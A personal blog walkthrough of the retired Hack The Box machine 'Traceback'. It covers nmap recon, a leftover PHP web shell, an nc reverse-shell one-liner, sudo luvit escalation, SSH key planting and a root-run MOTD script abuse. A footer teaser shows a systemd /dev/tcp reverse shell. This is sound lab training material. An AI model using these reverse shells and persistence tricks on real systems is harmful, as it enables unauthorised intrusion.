Skip to main content

Hackthebox.eu - Retired - Traceback

Hackthebox.eu - Retired - Traceback


Recon

As my normal. I start with a simple Up/Down scan on all TCP ports


Nmap -T4 -p- -oX ./nmapb.xml traceback.htb


Then I convert that to HTML to make it pretty


$ xsltproc ./nmapb.xml -o ./nmapb.html



Just three open ports 22, 80 and 8080


Let's scan again with the -A switch to try and finger OS/Service


$ nmap -T4 -p22,80,8080 -A -oX ./nmapf.xml traceback.htb


Then I convert that to HTML also

 xsltproc ./nmapf.xml -o ./nmapf.html



Port 22 is a fairly recent openssh

80 is apache

8080 is something strange… 


Lets see what we see on port 80



Looks like somebody has defaced the site




But they left us a backdoor?  I think it might have something to do with port 8080 but let's run dirb just in case

Trying to browse to port 8080 we get nothing


What about this part of our nmap output?


Googling around for http-proxy socks5 I eventually found this page

https://www.systutorials.com/proxy-using-ssh-tunnel/


It talks about setting up an SSH proxy 



What happens if we try to SSH into port 80




Cool there is SSH there…

What was the  hackers name again?



Oh yeah its right the in the screenshot


XH4H


Dirb wasn't very helpful


But this line in source code looks like a thread we should pull



I popped that into google and found this github


https://github.com/TheBinitGhimire/Web-Shells









I wonder if these shells might be what the hacker means back they left a backdoor


I just copied and pasted each one to see if it was in the root dir…


After almost exhausting the list we got this


Looking at the code for this shell the default creds are admin/admin



Let's try it



Yup


While I haven't exploited the system yet. Let's move over to the exploitation section or I'm going to feel dirty




Exploit



Ok so we got a shell cool



Let's poke around the OS and see what we can find


Here is the bash history for webadmin






Lua




https://www.lua.org/




Here is sudo -l


Webadmin can run this luvit application as sysadmin with no password



Let's grab a better shell than this PHP webshell



Let's listen on 5555 on our kali box


And run mkfifo on the web shell



rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 5555 >/tmp/f





Lets see what that application we found earlier does

$ sudo -u sysadmin /home/sysadmin/luvit



Googling around for luvit lands us here

https://luvit.io/


Using the Node-Style APIs

The luvit CLI tool can be used as a scripting platform just like node. This can be used to run lua scripts as standalone servers, clients, or other tools.

…. That sounds really interesting. I wonder if we can use a lua script to get a reverse shell as sysadmin..


So here is the easiest thing I can think to do is just have a lua script that can spawn a new shell as sysadmin


I created Lua script with this inside


os.execute('/bin/sh')


Then used python SimpleHTTPServer and wget to move it over to the traceback


On kali

/Desktop/HTB/traceback$ python -m SimpleHTTPServer 8080

On traceback

http://10.10.14.30:8080/Esc.lua


Then we use sudo to call the file Esc.lua as sysadmin


sudo -u sysadmin /home/sysadmin/luvit /tmp/circusmonkey/Esc.lua



Alright alright alright

Full House Whatever GIF



Let's get our user hash




cat user.txt

c24349701ae38c33ffbf0cceb2c46020


I created a new folder under tmp (because I'm too lazy to deal with the folder permissions we created with the webadmin user)


Mkdir /tmp/circusmonkey2


Let's use SimpleHTTPServer to transfer linEnum.sh over to traceback to see if we can find any misconfiguration we might find




We need to give this script execution rights


Chmod +x ./LinEnum.sh




This part of the running processes caught my attention



Looks like there is a running process as root that copies everything over from /var/backsups/.update-motd.d  to /etc/update-motd.d


This looks like a process that is meant to keep the /etc/update-motd.d folder from being messed with.


Every 30 seconds it resotes the file to a version that was backed up


MOTD… Things bring me back to my net admin days.. Setting the MOTD banner on cisco ios..



MOTD stands 




 

for Message of the Day.




fa

sd

sdaf 



This is a message that can be displayed on a ssh or telnet session(among other services). There can be a couple of different banner one that is a warning banner that can be displayed preauthentication and another that you will see after you authenticate.




Let's check out the folder that is being overwritten



Ooooooohhhhhh  the sysadmin group has write access to this….

Let's check out the 00-header file



See that last part


Welcome to Xh4Hland


Let's try to connect up using SSH to see if that is the message we get when we ssh in



Well that's not the same message….


Maybe our message is behind authentication. Let's put our ssh key in the authrozied_keys for sysadmin and see if we get a different message after we gain access.



Let's start by generating our private and public keys


$ ssh-keygen -t rsa


This makes a private and public key for us..


It puts the public key in the  directory we ran the command from


Since this is a live box and there are other users trying to root this box.. I don't want to overwrite the authorized_keys file for sysadmin


So let's add some padding to our public key so we have a bit of spaces in between


$ (echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > pubkey.txt



Now we can use >> to add this to the authorzied_keys file


On our shell


Cd /home/sysadmin/.ssh


 echo "



ssh-rsa AA*************************************************************************************************************************************************************************************************************************************** circusmonkey@kali



" >> authorized_keys


This should put our key at the bottom of the authroized_keys file


Now let's try to ssh with our private key



And there is that string we say in the 00-header file.



Let's edit the file to print out the root flag


Cd /etc/update-motd.d


$ echo "                                                                                                                                                                                                                                          cat /root/root.txt                                                                                                                                                                                                                    " >> 00-header



Then we'll cat the file to make sure it did put our cat in there.




Yup it's there let's open another terminal and try to ssh again



And there is our hash…. Since HTB is now rotating the hashes after every reset I'm not going to blur out the hash anymore since it shouldn't work by the time this goes public.


#################################

-------- OWNED BY XH4H  ---------

- I guess stuff could have been configured better ^^ -

#################################


Welcome to Xh4H land


c37bcae2b8b1cd4ed4addc68f243e1b0



Infinity War Yes GIF


Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more